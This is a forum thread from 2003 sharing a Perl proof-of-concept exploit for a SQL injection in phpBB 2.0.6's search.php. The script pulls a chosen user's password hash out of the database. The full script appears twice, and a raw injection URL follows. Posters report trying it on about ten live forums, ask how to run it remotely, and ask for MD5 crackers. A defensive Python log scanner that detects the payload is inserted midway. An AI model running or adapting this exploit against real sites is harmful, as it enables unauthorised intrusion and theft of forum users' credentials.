GaLiaRePt
Dec 21 2003, 10:17 AM
phpBB v2.06 search_id SQL injection PoC exploit
Date: 2003-12-21
Author: "f3sy1 f3sy1" <f3sy1@mail.ru>
Download: http://www.security-corporation.com/downlo...r57phpbb-poc.pl
| CODE |
#!/usr/bin/perl -w
use IO::Socket;

## PROOF-OF-CONCEPT
## * works only with mysql v>4.0
## * works only if the very first post on the forum has not been deleted
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##

if (@ARGV < 4) {
  print "\n\n";
  print "|****************************************************************|\n";
  print " r57phpbb.pl\n";
  print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
  print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
  print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
  print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
  print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
  print " [~] <server> - server ip\n";
  print " [~] <folder> - forum folder\n";
  print " [~] <user_id> - user id (2 default for phpBB admin)\n";
  print " [~] <search_id> - play with this value for results\n";
  print "|****************************************************************|\n";
  print "\n\n";
  exit(1);
}

$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request: the two char() lists spell out a serialized PHP array,
# and user_password is spliced into its split_search[0] slot, which search.php
# echoes back in the highlight= parameter of the result links
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>) {
  if ($answer =~ /;highlight=/) {
    $success = 1;
    @result = split(/;/, $answer);
    @result2 = split(/=/, $result[1]);
    $result2[1] =~ s/&/ /g;
    print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
  }
}
if ($success == 0) { print "[-] exploit failed =(\n"; }
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
|
Enjoy
kust0m3fr
Dec 21 2003, 05:29 PM
thx, I will try it..
dreedz
Dec 22 2003, 03:55 PM
didn't have any luck on the 10 or so forums I tried, code looking good though
Iced_Eagle
Jan 23 2004, 08:09 AM
Sorry that I need to bump this up, I really am. I am somewhat noobish to the whole security front. I am not sure exactly how you would run this file. Would you compile it as a freestanding executable? How would you run this remotely? Sorry for the really noob questions. Updated version with translated English comments at top:
| CODE |
#!/usr/bin/perl -w
use IO::Socket;

## PROOF-OF-CONCEPT
## * works only with mysql ver > 4.0
## * works only with post #1
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##

if (@ARGV < 4) {
  print "\n\n";
  print "|****************************************************************|\n";
  print " r57phpbb.pl\n";
  print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
  print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
  print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
  print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
  print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
  print " [~] <server> - server ip\n";
  print " [~] <folder> - forum folder\n";
  print " [~] <user_id> - user id (2 default for phpBB admin)\n";
  print " [~] <search_id> - play with this value for results\n";
  print "|****************************************************************|\n";
  print "\n\n";
  exit(1);
}

$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request: the two char() lists spell out a serialized PHP array,
# and user_password is spliced into its split_search[0] slot, which search.php
# echoes back in the highlight= parameter of the result links
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>) {
  if ($answer =~ /;highlight=/) {
    $success = 1;
    @result = split(/;/, $answer);
    @result2 = split(/=/, $result[1]);
    $result2[1] =~ s/&/ /g;
    print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
  }
}
if ($success == 0) { print "[-] exploit failed =(\n"; }
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
|
*edit* also, what is an efficient MD5 password hash decryptor? I found one 2 weeks ago, ran what I thought was an MD5 pass and kept it running all day and night and nothing happened, and I know I ran it right... any really really good ones out there, GUI-based preferably? thanks!
570n3d
Jan 23 2004, 10:47 AM
how can I scan for this vulnerability
Iced_Eagle
Jan 23 2004, 03:53 PM
Okay, sorry that I can't find it directly on the internet, but I have seen it.
What you do to test for it is put the SQL code into your web browser. If it gives you some sort of debug output you are not vulnerable. If it gives you an SQL error you are vulnerable.
So if I ran www.icedeaglephp.com (if that is a real site, sorry, no offense):
| CODE |
www.icedeaglephp.com/phpBB2/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[UID HERE]/*
|
plz someone correct me if I am wrong.
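Added here as a defender's counterpart to the PoC and to the "put the SQL code into your browser" test above (example code, not from the original posts, the RusH team or the phpBB project): it scans web-server access logs for search.php requests whose search_id is not the integer row id phpBB expects, and decodes the MySQL char() lists the PoC relies on so the injected value is readable. The log lines are constructed samples, and the set of keyword search_id values is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache-style log lines: one legitimate search, one shaped like the PoC
# in this thread (with a shortened char() list so the sample stays readable).
SAMPLE_LOG = r'''
203.0.113.5 - - [21/Dec/2003:10:17:02 +0000] "GET /phpBB2/search.php?search_id=2 HTTP/1.0" 200 4120
203.0.113.9 - - [21/Dec/2003:10:18:44 +0000] "GET /phpBB2/search.php?search_id=2%20union%20select%20concat(char(97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125))%20from%20phpbb_users%20where%20user_id=2/* HTTP/1.0" 200 5333
'''

REQ_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/\d\.\d"')
CHAR_RE = re.compile(r'char\(([\d,\s]+)\)', re.IGNORECASE)
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE | re.DOTALL)
# Non-numeric search_id values phpBB 2 accepts itself (assumed set; adjust to your version).
KEYWORD_IDS = {'', 'newposts', 'egosearch', 'unanswered'}


def decode_char_lists(s):
    """Replace every MySQL char(n,n,...) call with the string it assembles."""
    return CHAR_RE.sub(
        lambda m: ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()), s)


def inspect_request(path):
    """Return a finding for a suspicious search.php request, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith('/search.php'):
        return None
    raw = parse_qs(parts.query, keep_blank_values=True).get('search_id', [''])[0]
    if raw.isdigit() or raw in KEYWORD_IDS:
        return None                     # a row id or a known keyword: nothing to report
    decoded = decode_char_lists(unquote(raw))
    return {
        'search_id': decoded,           # injected value with char() lists made readable
        'union_select': bool(UNION_RE.search(decoded)),
        'reads_users_table': 'phpbb_users' in decoded.lower(),
    }


def scan_log(text):
    """Run inspect_request over every request line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        finding = inspect_request(m.group('path')) if m else None
        if finding:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A flagged request whose decoded search_id contains a serialized array fragment such as `a:1:{i:0;s:32:"` is the signature of this particular PoC; a plain `union select` from any other table still warrants a look.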
Iced_Eagle
Jan 26 2004, 01:35 AM
*bump* plz, I know somebody knows how to run this file remotely :\ really sorry for the double post.... really sorry